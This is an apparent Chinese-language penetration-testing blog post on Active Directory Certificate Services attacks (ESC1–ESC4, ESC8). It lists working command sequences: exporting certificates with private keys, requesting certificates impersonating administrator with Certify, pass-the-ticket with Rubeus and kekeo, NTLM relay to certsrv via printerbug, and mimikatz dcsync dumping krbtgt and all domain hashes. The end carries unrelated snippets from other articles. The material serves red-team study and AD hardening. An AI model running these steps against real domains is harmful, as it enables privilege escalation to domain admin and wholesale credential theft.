windows域之证书攻击手段

VSole2021-12-09 15:11:06
参考链接:https://xz.aliyun.com/t/10064
工具链接
https://github.com/GhostPack/Certify
证书服务发布的部分证书可用于kerberos认证,并且可以再返回的PAC中获取NTMLhash。
能进行认证的证书
1、客户端认证
2、PKINIT 客户端身份验证
3、智能卡登录
4、任何目的
5、子CA
其中ECS1和ECS8是比较常用的。中间的就记录一下。

搜索证书

certmgr.msc 图形化界面
certutil -user -store My //查看个人证书
certutil -user -store My f95e6b5dbafac54963c450052848745a54ec7bd9 c:\Users\test1\Desktop]test1.cer //导出证书
certutil -user -exportPFX f95e6b5dbafac54963c450052848745a54ec7bd9 c:\Users\test1\Desktop]test1.pfx //导出证书包含公私钥

利用导出的证书窃取凭借

1.查看用户的证书 certutil -user -store My2.导出用户证书,包含公私钥3.本地添加证书,配代理访问(kekeo校验的时候看到会对域控请求,所以需要配dns代理一起,这里为了方便就直接内网机做了)tgt::pac /subject:证书用户 /castore:current_user /domain:域控

总结一下,原因是证书中包含了用户的ntml信息,所以我们可以导出这些ntml信息(中间涉及一些证书不可导出的参考参考链接mimikatz导出)

ADCS ESC1

允许低权限用户使用任意SAN请求证书,从而允许低权限用户通过kerberos或schannel作为域中任何主体进行身份验证,白话文就是实现伪造身份
允许这些设置的已发布证书模板,攻击者可以作为环境中的任何人请求证书,使用该证书为用户获取TGT
最终实现低权限用户拥有域控权限

Certify.exe request /ca:yukongfu.e0mlja.com\e0mlja-YUKONGFU-CA-1 /template:LDAPS /altname:administrator//导出证书
openssl pkcs12 -in 1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
生成证书

注入证书
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.203.2 /ptt

ADCS ESC2

和ECS1类似,主要是他的条件更为宽松导致的
我们可以使用带有任何目的的EKU功能证书,进行客户端、服务端的身份验证,也可以使用无EKUs的证书来进行任何目的,或签署新的证书
因此使用从属CA(比跟CA低一级的CA)证书,攻击者能够指定新证书中的任意EKUs或字段

利用和ECS1一样,就不继续写命令了

ADCS ESC3

证书请求代理EKU允许委托人代表其他用户申请证书,对于任何注册此模板的用户,生成的证书可用于代表任何用户共同签署部署请求。代表其他用户来申请证书,和伪造类似

根据参考文章来看,工具没有跑出来,所以利用一下命令看
yukongfu.e0mlja.com\e0mlja-YUKONGFU-CA-1
查看 
Application Policies                  : 证书申请代理
pkiextendedkeyusage                   : 客户端身份验证, 证书申请代理是否具有

这里命令大同小异,记录一下就行,2019复现出错了。
Certify.exe request /ca:"dc.test.com\test-DC-CA" /template:ESC3
Certify.exe request /ca:"dc.test.com\test-DC-CA" /template:ESC3_1 /onbehalfof:TEST\administrator /enrollcert:3.pfx
openssl pkcs12 -in 1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Rubeus.exe asktgt /user:TEST\administrator /certificate:4.pfx

ADCS ESC4

https://www.cnblogs.com/sakura521/p/15489865.html
主要还是配置错误导致写权限可以写造成的。

ADCS ESC8

证书中继 ADCS Relay
攻击流程
1.通过ntlm_relay,我们获得一个以机器A用户认证的证书
2.我们通过Rubeus asktgt功能用这个证书向AD发起kerberos认证
3.我们获取到TGT并请求目标机器的TGS,获取权限
参考:https://www.cnblogs.com/marksec/p/15600759.html
环境配置也见参考链接

攻击利用

(1)certutil -config - -ping 获取证书服务器的ipcertutil  -ca(2)判断是否支持NTML方式curl  http://192.168.203.3/certsrv/ -I(3)中继利用python3 ntlmrelayx.py  -t http://192.168.237.22/certsrv/certfnsh.asp -smb2support --adcs 开启中继监听python printerbug.py domain/user:password@192.168.237.22 192.168.237.131打印机一:keko导出(注意参考链接给的代码是有问题的)kekeo:base64 /input:ontgt::ask /pfx:xxx /user:DC01$  /domain: /pttuser需要为我们获取证书的那个机器用户

看一下我全部的截图+命令
privilege::debug
kerberos::purge
//清楚票据 方便对比
base64 /input:on
tgt::ask /pfx:xxx /user:DC01$  /domain: /ptt 能够看到这里注入了一张kirtgt的票据,就可以
做金银票了。dumphash

Rubeus.exe asktgt /user:DC$ /certificate:MIIRFQIBAzCCEN8G /ppt

dumphash
lsadump::dcsync /all /csv /domain:e0mlja.com
lsadump::dcsync /user:krbtgt /csv

本作品采用《CC 协议》,转载必须注明作者和本文链接
证书服务发布的部分证书可用于kerberos认证,并且可以再返回的PAC中获取NTMLhash。
渗透重要漏洞汇总
2021 年上半年,全球网络安全界遭受了勒索软件攻击、重大供应链攻击以及有组织的黑客行动的轮番轰炸,攻击目标遍及医疗、金融、制造业、电信及交通等重点行业。数据泄露的规模、漏洞存在的年限、影响设备的数量、破坏效果呈扩大趋势。黑客攻击手段也更加复杂化,单笔勒索赎金更是达到创记录的 7000 万美元。
各经济体更加重视数据竞争力,纷纷制定出台数据战略,宣誓数据安全和主权。因此,欧盟认为必须建立欧洲数据主权。近年来,我国陆续发布了一系列数据及其安全相关的法律法规和标准规范,数据资产价值得到确认。2020年6月,12部委联合发布《网络安全审查办法》,推动建立国家网络安全审查工作机制。
国家工业信息安全发展研究中心作为国家级信息安全研究和推进机构,联合华为技术有限公司共同研究编制了《数据安全白皮书》,全面分析了我国数据安全产业基础、防护关键技术、法律法规体系现状,从提升数据安全产业基础能力、加快研究和应用数据安全防护技术、强化法律法规在数据安全主权的支撑保障作用等三方面展望数据安全发展未来,提出了数据安全发展倡议,为行业发展提供借鉴和参考,积极推动我国数据治理工作有序开展。
服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等 传输协议,通用漏洞,ex
日,乌克兰报道其最大固网电信运营商遭遇重大网络攻击下线。而俄罗斯电信监管机构也发文,称其正遭到定期的网络攻击。针对俄罗斯在乌克兰的军事行动,全球最大的黑客组织“匿名者”日前在社交网站上号召全球黑客对俄发起“网络战争”。
勒索软件入侵能力的革命性升级,始于与国家网络武器相结合,这构成了网络空间新的重大威胁来源。国家冲突向网络空间的映射,加速了网络空间的军备竞赛,而网络武器能复制、易拷贝的特殊属性,导致网络军备扩散难以控制。
数字安全时代,数据安全成为继信息安全、网络安全之后新的安全产业轴心。
5月7日,美国最大燃油运输管道商Colonial Pipeline公司因受勒索软件攻击,被迫临时关闭其美国东部沿海各州供油的关键燃油网络。为遏制威胁,公司已主动切断部分网络连接,暂停所有管道运营。为解除对燃料运输的各种限制,保障石油产品的公路运输,美国政府首次因网络攻击宣布18个州进入紧急状态。此次网络攻击是美国历史上针对公共事业的最大攻击之一,暴露美国能源安全行业的网络安全脆弱性,凸显了保护关键
VSole
网络安全专家